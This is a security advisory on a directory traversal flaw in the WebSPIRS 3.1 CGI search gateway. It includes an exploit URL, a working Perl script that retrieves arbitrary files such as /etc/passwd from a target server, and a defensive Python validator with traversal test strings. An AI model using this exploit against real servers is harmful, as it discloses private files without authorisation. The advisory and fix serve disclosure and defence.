COMMAND
WebSPIRS
SYSTEMS AFFECTED
WebSPIRS CGI 3.1 (at least)
PROBLEM
The following is based on UkR security team advisory #1. WebSPIRS
is SilverPlatter's Information Retrieval System for the World Wide
Web (WWW). It is a common gateway interface (CGI) application
which allows any forms-capable browser, such as Netscape, to
search SilverPlatter (SP) Electronic Reference Library (ERL)
databases available over the Internet.
The problem lies in incorrect validation of user input submitted
by the browser: a directory traversal sequence in the sp.nextform
parameter discloses any file on the system where the script is
installed. Exploit:
http://www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../path/to/file
Exploit code:
#!/usr/bin/perl
# Remote script to exploit bug in webspirs.cgi
# Affected systems: any where webspirs.cgi is installed
#
# Using by default "/"
# Spain 10-3-2001 (Crono) (crono@thepentagon.com)
use LWP::UserAgent;
use HTTP::Request;
use Socket;
use Getopt::Std;

# -h <host>  web server running webspirs.cgi
# -v <file>  absolute path of the file to request
getopts("h:v:c:", \%args);
# both -h and -v are required
if (!defined $args{h} || !defined $args{v}) {
print qq~
-=- WebSpirs Remote Script -=-
by Crono
Usage: perl unicode.pl -h <host> -v <file>
~;exit;
}
$host=$args{h};
$v=$args{v};
if (defined $args{h} && defined $args{v}) {
&conectar;
}
################
sub conectar {
################
print " - WebSpirs Remote Script Facility - -=- By Crono -=-\n";
print "\nAttempting to get: $v\n";
# resolve the host name to a dotted-quad address
my $server = inet_ntoa(inet_aton($host));
# build the traversal query string against the vulnerable parameter
my $url = "/cgi-bin/webspirs.cgi?sp.nextform=".
"../../../../..".
"$v";
my $ua = new LWP::UserAgent;
my $req = new HTTP::Request GET => "http://".$server.$url;
my $res = $ua->request($req);
my $web = $res->server;       # Server: header of the response
my $code = $res->code;        # HTTP status code
my $content = $res->content;  # response body
print "$web\t$code\n";
print "$content\n";
}
SOLUTION
When you try this with WebSpirs 4.2 it says, Security Violation
Detected, Contact your Systems Administrator. In WebSpirs 4.2
the way we have it is, URL/dbname?sp.nextform=blah/blah/blah. Now
if you switch the dbname with webspirs.cgi it comes back with no
data. Using it as the dbname?sp.nextform=../../../../etc/passwd
gives a security violation message.
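The following is an added illustration of the kind of validation the PROBLEM section says is missing and the SOLUTION section says 4.2 performs; it is not WebSPIRS code and the forms directory (/opt/webspirs/forms), the function names and the allowlist pattern are assumptions. It maps a submitted sp.nextform value to a file under a fixed forms directory, rejecting anything that is not a bare form name, and then double-checks containment after path normalisation.

```python
import posixpath
import re
from urllib.parse import parse_qs

# Assumed forms directory; the advisory does not say where WebSPIRS keeps its forms.
FORMS_ROOT = "/opt/webspirs/forms"

# Strict allowlist: a form name is a bare file name (no slashes, no leading dot),
# so the traversal strings quoted in the advisory never reach the filesystem.
FORM_NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")

# Message the advisory reports from WebSPIRS 4.2.
VIOLATION_MSG = "Security Violation Detected, Contact your Systems Administrator."


class SecurityViolation(Exception):
    """Raised when a submitted form name could reach a file outside FORMS_ROOT."""


def resolve_form(nextform: str, forms_root: str = FORMS_ROOT) -> str:
    """Map an sp.nextform value to a file path under forms_root.

    `nextform` must already be URL-decoded exactly once (parse_qs does that);
    checking the still-encoded value is a classic mistake because an encoded
    separator passes a naive test and only becomes '../' after decoding.
    """
    if "\x00" in nextform:
        raise SecurityViolation("NUL byte in form name")
    if not FORM_NAME_RE.fullmatch(nextform) or ".." in nextform:
        raise SecurityViolation(f"form name not in allowlist: {nextform!r}")
    # Defence in depth: normalise the way the filesystem would and confirm the
    # result still lies inside the forms directory.
    candidate = posixpath.normpath(posixpath.join(forms_root, nextform))
    root = forms_root.rstrip("/") + "/"
    if not candidate.startswith(root):
        raise SecurityViolation(f"form name escapes {forms_root}: {nextform!r}")
    # On a real deployment also compare os.path.realpath(candidate) against the
    # root, so a symlink inside the forms directory cannot point outside it.
    return candidate


def handle_query(query_string: str):
    """Emulate the gateway's handling of the sp.nextform parameter.

    Returns ("ok", path) for an acceptable form name and
    ("violation", message) otherwise.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    nextform = params.get("sp.nextform", [""])[0]
    try:
        return ("ok", resolve_form(nextform))
    except SecurityViolation:
        return ("violation", VIOLATION_MSG)


if __name__ == "__main__":
    # Constructed sample requests: one legitimate form name, then the advisory's
    # traversal string, a percent-encoded variant and an absolute path.
    for qs in (
        "sp.nextform=search.html",
        "sp.nextform=../../../../../../etc/passwd",
        "sp.nextform=%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        "sp.nextform=/etc/passwd",
    ):
        print(qs, "->", handle_query(qs))
```

The allowlist alone stops the traversal; the normpath containment check is there so that a later relaxation of the pattern (for example allowing subdirectories) still cannot reach outside the forms root. The parse_qs step decodes the parameter once, which is the only point where decoding should happen before validation.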